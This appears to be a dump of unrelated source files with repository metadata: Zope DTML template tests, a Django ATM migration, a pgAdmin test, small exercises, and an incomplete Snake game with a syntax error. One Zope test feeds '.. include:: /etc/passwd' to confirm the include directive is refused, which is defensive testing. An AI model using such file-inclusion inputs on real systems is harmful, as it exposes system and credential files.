% (contact['id'], contact['name'], contact['address']))
else:
print 'No contacts were updated.'
else:
print 'No contacts found to update.'
if __name__ == '__main__':
# Initialize client object.
dfp_client = DfpClient(path=os.path.join('..', '..', '..', '..', '..'))
main(dfp_client, CONTACT_ID)
| [
"cvserra@gmail.com"
] | cvserra@gmail.com |
06984e0cbe94716702eec1079b12b6cd613a7a7b | e1906617108e9026e7db30ca84fa6d2100b7286b | /Semana 1/Temperatura F° to C°.py | 2d9bc9f6b5b6f39f8947735f57a2e81fc5d0bc61 | [] | no_license | accuLucca/Curso-Introducao-a-Ciencia-da-Computacao-com-Python-Parte-1 | 96d9017c038217c3e8d8c7488eb29b7194fa9da3 | fe67deb98c04b7b102a5b3dcda2abb2c45a99d82 | refs/heads/main | 2023-03-19T19:36:29.191911 | 2021-03-23T14:08:09 | 2021-03-23T14:08:09 | 344,171,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | temperaturaFahrenheit=input("Insira uma temperatura em Fahrenheit")
temperaturaCelsius =(float(temperaturaFahrenheit)-32)* 5/ 9
print("Temperatura em Celsius:",float(temperaturaCelsius)) | [
"43175678+accuLucca@users.noreply.github.com"
] | 43175678+accuLucca@users.noreply.github.com |
6f4e4ade8178b4098daa3d93d71ad257cfd16109 | 0105f25282de5979dc5479a8b1032eaaa28f9cd3 | /main/migrations/0001_initial.py | ff2bb9fed80d12415b6066ec5a309d66302e1724 | [] | no_license | archi-max/ATM | 88460a4a883e855196287f57ca20b6b20f6e3205 | 33226da37fc624a7c7e48370239bc0473e6099bb | refs/heads/master | 2023-03-28T02:18:19.523299 | 2021-03-24T18:53:08 | 2021-03-24T18:53:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | # Generated by Django 3.1.7 on 2021-03-23 02:30
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('CardNumber', models.IntegerField()),
('PIN', models.PositiveSmallIntegerField()),
('CVV', models.PositiveSmallIntegerField()),
('Balance', models.PositiveSmallIntegerField()),
],
),
]
| [
"atulsyan850@gmail.com"
] | atulsyan850@gmail.com |
a1d4f595354a0c572ca7b1aa0b4325eaf227c9ce | ec21d4397a1939ac140c22eca12491c258ed6a92 | /Zope-2.9/lib/python/DocumentTemplate/tests/testDTML.py | 13621444b23ae590a45dfe79a7efeb236d8bd539 | [] | no_license | wpjunior/proled | dc9120eaa6067821c983b67836026602bbb3a211 | 1c81471295a831b0970085c44e66172a63c3a2b0 | refs/heads/master | 2016-08-08T11:59:09.748402 | 2012-04-17T07:37:43 | 2012-04-17T07:37:43 | 3,573,786 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,417 | py | ##############################################################################
#
# Copyright (c) 2002 Zope Corporation and Contributors. All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
"""Document Template Tests
"""
__rcs_id__='$Id: testDTML.py 69084 2006-07-10 20:39:09Z tseaver $'
__version__='$Revision: 1.15 $'[11:-2]
import sys, os
import unittest
if __name__=='__main__':
here = os.curdir
else:
from DocumentTemplate import tests
here = tests.__path__[0]
def read_file(name):
f = open(os.path.join(here, name), 'r')
res = f.read()
f.close()
return res
from DocumentTemplate.DT_HTML import HTML, String
from ExtensionClass import Base
class D:
__allow_access_to_unprotected_subobjects__ = 1
def __init__(self, **kw):
for k, v in kw.items(): self.__dict__[k]=v
def __repr__(self): return "D(%s)" % `self.__dict__`
def d(**kw): return kw
class PukeError(Exception):
"""Exception raised in test code."""
class DTMLTests (unittest.TestCase):
doc_class = HTML
def testBatchingEtc(self):
def item(key,**kw): return (key,kw)
def item2(key,**kw): return kw
class item_class:
def __init__(self,key,**kw):
for k in kw.keys(): self.__dict__[k]=kw[k]
items=(
item( 1,dealer='Bay Chevy', make='Chevrolet',
model='Caprice', year=96),
item( 2,dealer='Bay Chevy', make='Chevrolet',
model='Nova', year=96),
item( 4,dealer='Bay Chevy', make='Chevrolet',
model='Nova', year=96),
item( 5,dealer='Bay Chevy', make='Chevrolet',
model='Nova', year=96),
item( 3,dealer='Bay Chevy', make='Chevrolet',
model='Corvett', year=96),
item( 6,dealer='Bay Chevy', make='Chevrolet',
model='Lumina', year=96),
item( 7,dealer='Bay Chevy', make='Chevrolet',
model='Lumina', year=96),
item( 8,dealer='Bay Chevy', make='Chevrolet',
model='Lumina', year=95),
item( 9,dealer='Bay Chevy', make='Chevrolet',
model='Corsica', year=96),
item(10,dealer='Bay Chevy', make='Chevrolet',
model='Corsica', year=96),
item(11,dealer='Bay Chevy', make='Toyota',
model='Camry', year=95),
item(12,dealer='Colman Olds', make='Olds',
model='Ciera', year=96),
item(12,dealer='Colman Olds', make='Olds',
model='Ciera', year=96),
item(12,dealer='Colman Olds', make='Olds',
model='Ciera', year=96),
item(12,dealer='Colman Olds', make='Olds',
model='Cutlass', year=96),
item(12,dealer='Colman Olds', make='Olds',
model='Cutlas', year=95),
item(12,dealer='Colman Olds', make='Dodge',
model='Shadow', year=93),
item(12,dealer='Colman Olds', make='Jeep',
model='Cheroke', year=94),
item(12,dealer='Colman Olds', make='Toyota',
model='Previa', year=92),
item(12,dealer='Colman Olds', make='Toyota',
model='Celica', year=93),
item(12,dealer='Colman Olds', make='Toyota',
model='Camry', year=93),
item(12,dealer='Colman Olds', make='Honda',
model='Accord', year=94),
item(12,dealer='Colman Olds', make='Honda',
model='Accord', year=92),
item(12,dealer='Colman Olds', make='Honda',
model='Civic', year=94),
item(12,dealer='Colman Olds', make='Honda',
model='Civix', year=93),
item( 1,dealer='Spam Chev', make='Chevrolet',
model='Caprice', year=96),
item( 2,dealer='Spam Chev', make='Chevrolet',
model='Nova', year=96),
item( 4,dealer='Spam Chev', make='Chevrolet',
model='Nova', year=96),
item( 5,dealer='Spam Chev', make='Chevrolet',
model='Nova', year=96),
item( 3,dealer='Spam Chev', make='Chevrolet',
model='Corvett', year=96),
item( 6,dealer='Spam Chev', make='Chevrolet',
model='Lumina', year=96),
item( 7,dealer='Spam Chev', make='Chevrolet',
model='Lumina', year=96),
item( 8,dealer='Spam Chev', make='Chevrolet',
model='Lumina', year=95),
item( 9,dealer='Spam Chev', make='Chevrolet',
model='Corsica', year=96),
item(10,dealer='Spam Chev', make='Chevrolet',
model='Corsica', year=96),
item(11,dealer='Spam Chevy', make='Toyota',
model='Camry', year=95),
item(12,dealer='Spam Olds', make='Olds',
model='Ciera', year=96),
item(12,dealer='Spam Olds', make='Olds',
model='Ciera', year=96),
item(12,dealer='Spam Olds', make='Olds',
model='Ciera', year=96),
item(12,dealer='Spam Olds', make='Olds',
model='Cutlass', year=96),
item(12,dealer='Spam Olds', make='Olds',
model='Cutlas', year=95),
item(12,dealer='Spam Olds', make='Dodge',
model='Shadow', year=93),
item(12,dealer='Spam Olds', make='Jeep',
model='Cheroke', year=94),
item(12,dealer='Spam Olds', make='Toyota',
model='Previa', year=92),
item(12,dealer='Spam Olds', make='Toyota',
model='Celica', year=93),
item(12,dealer='Spam Olds', make='Toyota',
model='Camry', year=93),
item(12,dealer='Spam Olds', make='Honda',
model='Accord', year=94),
item(12,dealer='Spam Olds', make='Honda',
model='Accord', year=92),
item(12,dealer='Spam Olds', make='Honda',
model='Civic', year=94),
item(12,dealer='Spam Olds', make='Honda',
model='Civix', year=93),
)
html=self.doc_class(read_file('dealers.dtml'))
res = html(inventory=items, first_ad=15)
expected = read_file('dealers.out')
self.assertEqual(res,expected)
def testSequenceSummaries(self):
def d(**kw): return kw
data=(d(name='jim', age=38),
# d(name='kak', age=40),
d(name='will', age=7),
d(name='drew', age=4),
d(name='ches', age=1),
)
html = self.doc_class('<dtml-in data mapping>'
'<dtml-if sequence-end>'
'Variable "name": '
'min=<dtml-var min-name> '
'max=<dtml-var max-name> '
'count=<dtml-var count-name> '
'total=<dtml-var total-name> '
'median=<dtml-var median-name> '
'Variable "age": '
'min=<dtml-var min-age> '
'max=<dtml-var max-age> '
'count=<dtml-var count-age> '
'total=<dtml-var total-age> '
'median=<dtml-var median-age> '
'mean=<dtml-var mean-age> '
'<dtml-let sda=standard-deviation-age>'
's.d.=<dtml-var expr="_.int(sda)">'
'</dtml-let>'
'</dtml-if sequence-end>'
'</dtml-in data>')
res = html(data=data)
expected = ('Variable "name": min=ches max=will count=4 total= '
'median=between jim and drew '
'Variable "age": min=1 max=38 count=4 total=50 '
'median=5 mean=12.5 s.d.=17')
assert res == expected, res
def testDTMLDateFormatting(self):
import DateTime
html = self.doc_class(
"<dtml-var name capitalize spacify> is "
"<dtml-var date fmt=year>/<dtml-var date "
"fmt=month>/<dtml-var date fmt=day>")
res = html(date=DateTime.DateTime("1995-12-25"),
name='christmas_day')
expected = 'Christmas day is 1995/12/25'
assert res == expected, res
def testSimpleString(self):
dt = String('%(name)s')
res = dt(name='Chris')
expected = 'Chris'
assert res == expected, res
def testStringDateFormatting(self):
import DateTime
html = String("%(name capitalize spacify)s is "
"%(date fmt=year)s/%(date fmt=month)s/%(date fmt=day)s")
res = html(date=DateTime.DateTime("2001-04-27"),
name='the_date')
expected = 'The date is 2001/4/27'
assert res == expected, res
def testSequence1(self):
html=self.doc_class(
'<dtml-in spam><dtml-in sequence-item><dtml-var sequence-item> '
'</dtml-in sequence-item></dtml-in spam>')
expected = '1 2 3 4 5 6 '
res = html(spam=[[1,2,3],[4,5,6]])
assert res == expected, res
def testSequence2(self):
html=self.doc_class(
'<dtml-in spam><dtml-in sequence-item><dtml-var sequence-item>-'
'</dtml-in sequence-item></dtml-in spam>')
expected = '1-2-3-4-5-6-'
res = html(spam=[[1,2,3],[4,5,6]])
assert res == expected, res
def testNull(self):
html=self.doc_class('<dtml-var spam fmt="$%.2f bobs your uncle" '
'null="spam%eggs!|">')
expected = '$42.00 bobs your unclespam%eggs!|'
res = html(spam=42) + html(spam=None)
assert res == expected, res
def testUrlUnquote(self):
html1 = self.doc_class(
"""
<dtml-var expr="'http%3A//www.zope.org%3Fa%3Db%20123'" fmt=url-unquote>
"""
)
html2 = self.doc_class(
"""
<dtml-var expr="'http%3A%2F%2Fwww.zope.org%3Fa%3Db+123'" fmt=url-unquote-plus>
"""
)
expected = (
"""
http://www.zope.org?a=b 123
"""
)
self.assertEqual(html1(), expected)
self.assertEqual(html2(), expected)
html1 = self.doc_class(
"""
<dtml-var expr="'http%3A//www.zope.org%3Fa%3Db%20123'" url_unquote>
"""
)
html2 = self.doc_class(
"""
<dtml-var expr="'http%3A%2F%2Fwww.zope.org%3Fa%3Db+123'" url_unquote_plus>
"""
)
expected = (
"""
http://www.zope.org?a=b 123
"""
)
self.assertEqual(html1(), expected)
self.assertEqual(html2(), expected)
def test_fmt(self):
html=self.doc_class(
"""
<dtml-var spam>
html=<dtml-var spam fmt=html-quote>
url=<dtml-var spam fmt=url-quote>
multi=<dtml-var spam fmt=multi-line>
dollars=<dtml-var spam fmt=whole-dollars>
cents=<dtml-var spam fmt=dollars-and-cents>
dollars,=<dtml-var spam fmt=dollars-with-commas>
cents,=<dtml-var spam fmt=dollars-and-cents-with-commas>""")
expected = (
'''
4200000
html=4200000
url=4200000
multi=4200000
dollars=$4200000
cents=$4200000.00
dollars,=$4,200,000
cents,=$4,200,000.00
None
html=None
url=None
multi=None
dollars=
cents=
dollars,=
cents,=
<a href="spam">
foo bar
html=<a href="spam">
foo bar
url=%3Ca%20href%3D%22spam%22%3E%0Afoo%20bar
multi=<a href="spam"><br />
foo bar
dollars=
cents=
dollars,=
cents,=''')
res = html(spam=4200000) + html(spam=None) + html(
spam='<a href="spam">\nfoo bar')
self.assertEqual(res,expected)
def test_fmt_reST_include_directive_raises(self):
source = '.. include:: /etc/passwd'
html = self.doc_class('<dtml-var name="foo" fmt="restructured-text">')
html._vars['foo'] = source
self.assertRaises(NotImplementedError, html)
def test_fmt_reST_raw_directive_disabled(self):
EXPECTED = '<h1>HELLO WORLD</h1>'
source = '.. raw:: html\n\n %s\n' % EXPECTED
html = self.doc_class('<dtml-var name="foo" fmt="restructured-text">')
html._vars['foo'] = source
result = html() # don't raise, but don't work either
self.failIf(EXPECTED in result)
self.failUnless(""raw" directive disabled" in result)
from cgi import escape
self.failUnless(escape(EXPECTED) in result)
def test_fmt_reST_raw_directive_file_option_raises(self):
source = '.. raw:: html\n :file: inclusion.txt'
html = self.doc_class('<dtml-var name="foo" fmt="restructured-text">')
html._vars['foo'] = source
self.assertRaises(NotImplementedError, html, source)
def test_fmt_reST_raw_directive_url_option_raises(self):
source = '.. raw:: html\n :url: http://www.zope.org'
html = self.doc_class('<dtml-var name="foo" fmt="restructured-text">')
html._vars['foo'] = source
self.assertRaises(NotImplementedError, html, source)
def testPropogatedError(self):
class foo:
def __len__(self): return 9
def __getitem__(self,i):
if i >= 9: raise IndexError, i
return self.testob(i)
class testob (Base):
__roles__ = None # Public
def __init__(self, index):
self.index = index
self.value = 'item %s' % index
getValue__roles__ = None # Public
def getValue(self):
return self.value
puke__roles__ = None # Public
def puke(self):
raise PukeError('raaalf')
html=self.doc_class(
"""
<dtml-if spam>
<dtml-in spam>
<dtml-var getValue>
<dtml-var puke>
</dtml-in spam>
</dtml-if spam>
""")
try:
html(spam=foo())
except PukeError:
# Passed the test.
pass
else:
assert 0, 'Puke error not propogated'
def testRenderCallable(self):
"Test automatic rendering of callable objects"
class C (Base):
__allow_access_to_unprotected_subobjects__ = 1
x=1
def y(self): return self.x*2
C.h = self.doc_class("The h method, <dtml-var x> <dtml-var y>")
C.h2 = self.doc_class("The h2 method")
expected = "1, 2, The h method, 1 2"
res = self.doc_class("<dtml-var x>, <dtml-var y>, <dtml-var h>")(C())
assert res == expected, res
expected = (
'''
1,
2,
The h2 method''')
res = self.doc_class(
'''
<dtml-var expr="_.render(i.x)">,
<dtml-var expr="_.render(i.y)">,
<dtml-var expr="_.render(i.h2)">''')(i=C())
assert res == expected, res
def testWith(self):
class person:
__allow_access_to_unprotected_subobjects__ = 1
name='Jim'
height_inches=73
expected = 'Hi, my name is %s and my height is %d cm.' % (
person.name, int(person.height_inches * 2.54))
res = self.doc_class(
'<dtml-with person>Hi, my name is <dtml-var name> '
'and my height is <dtml-var "_.int(height_inches*2.54)"> '
'cm.</dtml-with>')(person=person)
assert res == expected, res
def testRaise(self):
try:
res = self.doc_class(
"<dtml-raise IndexError>success!</dtml-raise>")()
except IndexError, v:
res = v
assert str(res) == 'success!', `res`
def testNoItemPush(self):
data=d(sec='B', name='XXX', sub=(d(name='b1'),d(name='b2',sec='XXX')))
html = """
<dtml-with data mapping><dtml-in sub no_push_item>
<dtml-var sec>.<dtml-with sequence-item mapping><dtml-var name></dtml-with>
</dtml-in></dtml-with>
"""
expected = """
B.b1 B.b2"""
result = self.doc_class(html)(data=data)
assert result == expected, result
def testBasicHTMLIn(self):
data=(
d(name='jim', age=39),
d(name='kak', age=29),
d(name='will', age=8),
d(name='andrew', age=5),
d(name='chessie',age=2),
)
html="""
<!--#in data mapping-->
<!--#var name-->, <!--#var age-->
<!--#/in-->
"""
expected = """
jim, 39
kak, 29
will, 8
andrew, 5
chessie, 2
"""
result = self.doc_class(html)(data=data)
assert result == expected, result
def testBasicHTMLIn2(self):
xxx=(D(name=1), D(name=2), D(name=3))
html = """
<!--#in xxx-->
<!--#var name -->
<!--#/in-->
"""
expected = """
1
2
3
"""
result = self.doc_class(html)(xxx=xxx)
assert result == expected, result
def testBasicHTMLIn3(self):
ns = {'prop_ids': ('title', 'id'), 'title': 'good', 'id': 'times'}
html = """:<dtml-in prop_ids><dtml-var sequence-item>=<dtml-var
expr="_[_['sequence-item']]">:</dtml-in>"""
result = self.doc_class(html)(None, ns)
expected = ":title=good:id=times:"
assert result == expected, result
def testHTMLInElse(self):
xxx=(D(name=1), D(name=2), D(name=3))
html="""
<!--#in data mapping-->
<!--#var name-->, <!--#var age-->
<!--#else-->
<!--#in xxx-->
<!--#var name -->
<!--#/in-->
<!--#/in-->
"""
expected = """
1
2
3
"""
result = self.doc_class(html)(xxx=xxx, data={})
assert result == expected, result
def testBasicStringIn(self):
data=(
d(name='jim', age=39),
d(name='kak', age=29),
d(name='will', age=8),
d(name='andrew', age=5),
d(name='chessie',age=2),
)
s="""
%(in data mapping)[
%(name)s, %(age)s
%(in)]
"""
expected = """
jim, 39
kak, 29
will, 8
andrew, 5
chessie, 2
"""
result = String(s)(data=data)
assert expected == result, result
def test_suite():
suite = unittest.TestSuite()
suite.addTest( unittest.makeSuite( DTMLTests ) )
return suite
def main():
unittest.TextTestRunner().run(test_suite())
if __name__ == '__main__':
main()
| [
"root@cpro5106.publiccloud.com.br"
] | root@cpro5106.publiccloud.com.br |
d69de5a1d4c99f7f6e96fba9499c7fc95016b677 | 0f23caca0ae990204483f9de9f964510703f5f40 | /0004.py | 5795aa73bd9e8bd8fe9200cb576270ee03264014 | [] | no_license | moniq/Euler-project-python3 | df2bdabfb9296ce7b326560c8e44776d5140f24f | e22d6ab468a8afd190cbc04a711d3e96db181b1f | refs/heads/master | 2020-12-30T15:54:01.167722 | 2017-05-13T18:25:37 | 2017-05-13T18:25:37 | 91,178,214 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | #=====================================
# PALINDROMIC NUMBER e.g. 9009, 90109
# https://projecteuler.net/problem=4
#=====================================
import profile
def is_palindromic(number):
# if number < 0 or has only one digit is not palindromic
if number-10 <= 0:
return False
st = str(number)
if st == st[::-1]:
return True
return False
def find_palindromic(limit_min, limit_max):
max_paldimore = [0, 0, 0] # x*y, x, y
for x in range(limit_max, limit_min, -1):
for y in range(x, limit_min, -1):
tmp = x * y
if tmp > max_paldimore[0] and is_palindromic(tmp):
max_paldimore = [tmp, x, y]
return max_paldimore
profile.run('print (find_palindromic(100, 999))')
| [
"noreply@github.com"
] | noreply@github.com |
7e862eae0d9148a1e0b88084c5981c3280296cc4 | 53b1cf89f3ac00d86add6dc6e103160d50e1b4ea | /pgadmin/pgadmin4/web/pgadmin/browser/server_groups/servers/tests/test_server_get.py | 338f7fcfb45c96ee37238b621d1a4a0c92353062 | [
"PostgreSQL"
] | permissive | luvres/armhf | b5e9e59c0e5db7f4a280242a0d940c4066a47716 | aa1ec48e246f1fb8e0f4099fa8d392eddcb414ad | refs/heads/master | 2021-10-01T19:08:53.395884 | 2018-11-28T17:57:42 | 2018-11-28T17:57:42 | 79,672,248 | 10 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,629 | py | # ##########################################################################
#
# #pgAdmin 4 - PostgreSQL Tools
#
# #Copyright (C) 2013 - 2016, The pgAdmin Development Team
# #This software is released under the PostgreSQL Licence
#
# ##########################################################################
from pgadmin.utils.route import BaseTestGenerator
from regression import test_utils as utils
from regression import parent_node_dict
class ServersGetTestCase(BaseTestGenerator):
"""
This class will fetch added servers under default server group
by response code.
"""
scenarios = [
# Fetch the default url for server node
('Default Server Node url', dict(url='/browser/server/obj/'))
]
def setUp(self):
"""This function add the server to test the GET API"""
self.server_id = utils.create_server(self.server)
server_dict = {"server_id": self.server_id}
utils.write_node_info("sid", server_dict)
def runTest(self):
""" This function will fetch the added servers to object browser. """
server_id = parent_node_dict["server"][-1]["server_id"]
if not server_id:
raise Exception("Server not found to test GET API")
response = self.tester.get(self.url + str(utils.SERVER_GROUP) + '/' +
str(server_id),
follow_redirects=True)
self.assertEquals(response.status_code, 200)
def tearDown(self):
"""This function delete the server from SQLite """
utils.delete_server_with_api(self.tester, self.server_id)
| [
"luvres@hotmail.com"
] | luvres@hotmail.com |
fec9542a490d26aa855dab0e2d6f204c0a65f190 | 55628a9a08a6b6646b4a8aa74bedbf2e3fd7d850 | /.history/master_20200126005041.py | 0cf75bdb067cd902873d4068cf323f8de7ac42e3 | [] | no_license | StRobertCHSCS/final-project-team | c115dc11b318f7ac782c94860a8801bb558bd107 | 48907e72813c4dd3b48ff36f794f6fce04533219 | refs/heads/master | 2020-12-03T22:35:37.833893 | 2020-01-31T04:05:38 | 2020-01-31T04:05:38 | 231,506,873 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,880 | py | '''
-**make snake longer when eaten
- FIGURE OUT HOW TO KNOW WHERE TO ADD THE NEXT BLOCK (MOVE LAST LOCATION TO BACK)
DONEEE
-fix player_location lists, so that the list only has the location of the current snake location, not infinite list (done)
- fix apple so disappers when you go over it (done)
- add score (done)
-fix speed so that it resets when you go back to main page
- add high score page (txt file, saves high scores outside of program)
'''
import arcade
import random
import json
import time
# Starting screen
alive_button = []
start_button_text = ["Noob: 0.5 speed \n (Refresh rate 1/5 seconds)",
"Normal speed: 1 \n (Refresh rate 1/10 seconds)",
"Hard: 1.5 speed \n (Refresh rate 1/15 seconds)",
"Expert: 2.5 speed \n (Refresh rate 1/25 seconds)"]
for i in range (2, 10, 2):
start_options = [i*100, 200, 150, 50, start_button_text[(i // 2) - 1]] # x, y, width, height
alive_button.append(start_options)
show_text = False
# Set how many rows and columns we will have
ROW_COUNT = 29
COLUMN_COUNT = 51
# This sets the WIDTH and HEIGHT of each grid location
WIDTH = 20
HEIGHT = 20
# This sets the margin between each cell
# and on the edges of the screen.
MARGIN = 5
# Do the math to figure out our screen dimensions
SCREEN_WIDTH = (WIDTH + MARGIN) * COLUMN_COUNT + MARGIN
SCREEN_HEIGHT = (HEIGHT + MARGIN) * ROW_COUNT + MARGIN
# Death screen
dead_button = []
death_button_text = ["Retry", "Starting screen", "High scores", "Quit"]
text_num = 0
for x in range (1, 5, 2):
for y in range (1, 5, 2):
death_options = [x*(SCREEN_WIDTH//4) - 75, y*(SCREEN_HEIGHT//4) - 75 , 150, 150, death_button_text[text_num]] # x, y, width, height
dead_button.append(death_options)
text_num += 1
# Direction the snake is moving in
up = False
down = False
left = False
right = False
# Use snakes position shown on grid, not the python coordinates
player_x_column = 5
player_y_row = 5
# Length of the snake body
body = 1
# Current snake location
snake_pos = []
# Determine where the starting apple will be drawn in
apple_x = random.randint(0, COLUMN_COUNT)
apple_y = random.randint(0, ROW_COUNT)
# Boolean to see if apple needs to be moved
apple_display = True
# Background grid
grid_texture = arcade.load_texture("29x51_grid.jpg")
score = 0
# Landing page, game, death screen, or high score
page = 0
SPEED = 1
high_score = 0
time = 0
millisecond = 0
second = 0
red = 0
green = 255
blue = 0
def on_update(delta_time):
snake_move()
def on_draw():
global page
arcade.start_render()
if page == 0:
start_screen()
elif page == 1:
main_game()
elif page == 2:
grid_background()
death_screen()
elif page == 3:
high_score_page()
print(time)
def stop_watch():
global time, second, millisecond
time += 1
if (time * SPEED) % SPEED == 0):
millisecond += 1
if (time % SPEED == 0):
second += 1
minute = int(second//60)
arcade.draw_text(f"Time: {minute:02d}:{second:02d}: {millisecond: 01d}", 75, SCREEN_HEIGHT - 50, arcade.color.BLUE,
25, font_name='calibri', bold = True, anchor_x="center", anchor_y="center")
def high_score_check():
global high_score, score
with open("high_score.json", "r") as high_score_file:
high_score = json.load(high_score_file)
with open("high_score.json", "w") as high_score_file:
if score > high_score:
json.dump(score, high_score_file)
else:
json.dump(high_score, high_score_file)
def high_score_page():
global high_score
high_score_check()
arcade.draw_text("The high score is " + str(high_score), SCREEN_WIDTH //2, SCREEN_HEIGHT // 2,
arcade.color.WHITE, 50, font_name='calibri', anchor_x="center", anchor_y="center")
def main_game():
grid_background()
snake()
apple()
stop_watch()
def start_screen():
global alive_button
arcade.draw_text("Welcome to snake \n choose your level", (SCREEN_WIDTH//2), 3*(SCREEN_HEIGHT//4),
arcade.color.WHITE, 25, font_name='calibri', anchor_x="center", anchor_y="center")
# arcade.draw_text(str(current_time), (3 * SCREEN_WIDTH // 4), (SCREEN_HEIGHT//4),
# arcade.color.BLACK, 25, font_name='calibri', anchor_x="center", anchor_y="center")
for i in range (0, 4):
arcade.draw_xywh_rectangle_filled(alive_button[i][0],
alive_button[i][1],
alive_button[i][2],
alive_button[i][3],
arcade.color.WHITE)
arcade.draw_text(alive_button[i][4], alive_button[i][0] + (alive_button[i][2] // 2), alive_button[i][1] + (alive_button[i][3] // 2),
arcade.color.BLACK, 10, font_name='calibri', anchor_x="center", anchor_y="center")
def death_screen():
global dead_button, death_button_text, red, green, blue
if (red == 255 and 0 <= green < 255 and blue == 0):
green += 5
elif (0 < red <= 255 and green == 255 and blue == 0):
red -= 5
elif (red == 0 and green == 255 and 0 <= blue < 255):
blue += 5
elif (red == 0 and 0 < green <= 255 and blue == 255):
green -= 5
elif (0 <= red < 255 and green == 0 and blue == 255):
red += 5
elif (red == 255 and green == 0 and 0 < blue <= 255):
blue -= 5
for i in range (2):
arcade.draw_text("You died rip lol", random.randint(50, SCREEN_WIDTH), random.randint(50, SCREEN_HEIGHT), (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)),
50, font_name='calibri', bold = True, anchor_x="center", anchor_y="center")
for i in range (0, 4):
arcade.draw_xywh_rectangle_filled(dead_button[i][0],
dead_button[i][1],
dead_button[i][2],
dead_button[i][3],
(red, blue, green))
arcade.draw_text(dead_button[i][4], dead_button[i][0] + (dead_button[i][2] // 2), dead_button[i][1] + (dead_button[i][3] // 2),
arcade.color.BLACK, 15, font_name='calibri', anchor_x="center", anchor_y="center")
def grid_background():
arcade.draw_texture_rectangle(SCREEN_WIDTH//2, SCREEN_HEIGHT//2, grid_texture.width, grid_texture.height, grid_texture, 0)
def snake_move():
global player_x, player_y, player_x_column, player_y_row
global snake_pos
global page, score
if (0 <= player_x_column < COLUMN_COUNT) and (0 <= player_y_row < ROW_COUNT):
if up:
player_y_row += 1
elif down:
player_y_row -= 1
elif right:
player_x_column += 1
elif left:
player_x_column -= 1
else:
page = 2
suicide_check = []
for position in snake_pos:
if position not in suicide_check:
suicide_check.append(position)
else:
page = 2
# Player coordinates
player_x = (MARGIN + WIDTH) * player_x_column + MARGIN + WIDTH // 2
player_y = (MARGIN + HEIGHT) * player_y_row + MARGIN + HEIGHT // 2
def restart():
global player_x_column, player_y_row, snake_len, body, snake_pos
global up, down, left, right
global page, score, time
player_x_column = 5
player_y_row = 5
snake_len = []
body = 1
snake_pos = []
up = False
down = False
left = False
right = False
page = 1
score = 0
time = 0
print ("You died")
def snake():
global player_x_column, player_y_row, snake_len, body
global apple_x, apple_y
arcade.draw_rectangle_filled(player_x , player_y, WIDTH, HEIGHT, arcade.color.BLUE)
snake_len = [[player_x_column, player_y_row]]
snake_pos.append([player_x_column, player_y_row])
if body < len(snake_pos):
snake_pos.pop(0)
if (body > 1):
for num in range (1, body):
snake_len.append([snake_pos[num - 1][0], snake_pos[num - 1][1]])
for i in range (body):
arcade.draw_rectangle_filled(
(MARGIN + WIDTH) * snake_len[i][0] + MARGIN + WIDTH // 2,
(MARGIN + HEIGHT) * snake_len[i][1] + MARGIN + HEIGHT // 2 ,
WIDTH, HEIGHT, arcade.color.BLUE)
def apple():
global apple_x, apple_y, apple_x_coordinate, apple_y_coordinate, body, snake_len
global score
global SPEED
apple_x_coordinate = (MARGIN + WIDTH) * apple_x + MARGIN + WIDTH // 2
apple_y_coordinate = (MARGIN + HEIGHT) * apple_y + MARGIN + HEIGHT // 2
if (player_x_column == apple_x) and (player_y_row == apple_y):
apple_display = False
body += 1
print ("hit")
else:
apple_display = True
if apple_display is True:
arcade.draw_rectangle_filled(apple_x_coordinate, apple_y_coordinate, WIDTH, HEIGHT, arcade.color.RED)
elif apple_display is False:
apple_x = random.randint(0, COLUMN_COUNT)
apple_y = random.randint(0, ROW_COUNT)
# Make sure that apple doesn't spawn where the snake is
for apple in range (len(snake_pos)):
if apple_x == snake_pos[apple][0] or apple_y == snake_pos[apple][1]:
apple_x = random.randint(0, COLUMN_COUNT)
apple_y = random.randint(0, ROW_COUNT)
apple_x_coordinate = (MARGIN + WIDTH) * apple_x + MARGIN + WIDTH // 2
apple_y_coordinate = (MARGIN + HEIGHT) * apple_y + MARGIN + HEIGHT // 2
score += 10
apple_display == True
arcade.draw_text("Score is " + str(score), SCREEN_WIDTH - 75, SCREEN_HEIGHT - 50, arcade.color.GREEN,
25, font_name='calibri', bold = True, anchor_x="center", anchor_y="center")
def on_key_press(key, modifiers):
    """WASD steering while in-game (page 1).

    A key is ignored when it would reverse the snake straight into itself
    (e.g. pressing W while already moving down).
    """
    global up, down, left, right
    if page != 1:
        return
    if key == arcade.key.W and not down:
        up, down, left, right = True, False, False, False
    elif key == arcade.key.S and not up:
        up, down, left, right = False, True, False, False
    elif key == arcade.key.A and not right:
        up, down, left, right = False, False, True, False
    elif key == arcade.key.D and not left:
        up, down, left, right = False, False, False, True
def on_key_release(key, modifiers):
    # Key releases are intentionally ignored; direction changes happen on press.
    pass
def on_mouse_press(x, y, button, modifiers):
    """Dispatch clicks on the start screen (page 0) and the death screen (page 2).

    Buttons are hit-tested against rectangles stored as (x, y, width, height)
    tuples in ``alive_button`` (start screen) and ``dead_button`` (death screen).
    On the start screen each button picks a difficulty, advances to the game
    page and reschedules the update loop at the matching frame rate.
    """
    global alive_button, dead_button, page
    global start_screen, restart
    global high_score_page
    global SPEED
    if page == 0:
        # For starting screen, check which button has been clicked
        if (x > alive_button[0][0] and x < alive_button[0][0] + alive_button[0][2] and
                y > alive_button[0][1] and y < alive_button[0][1] + alive_button[0][3]):
            page += 1
            SPEED = 5
            arcade.schedule(on_update, 1/(SPEED))
            print("noob")
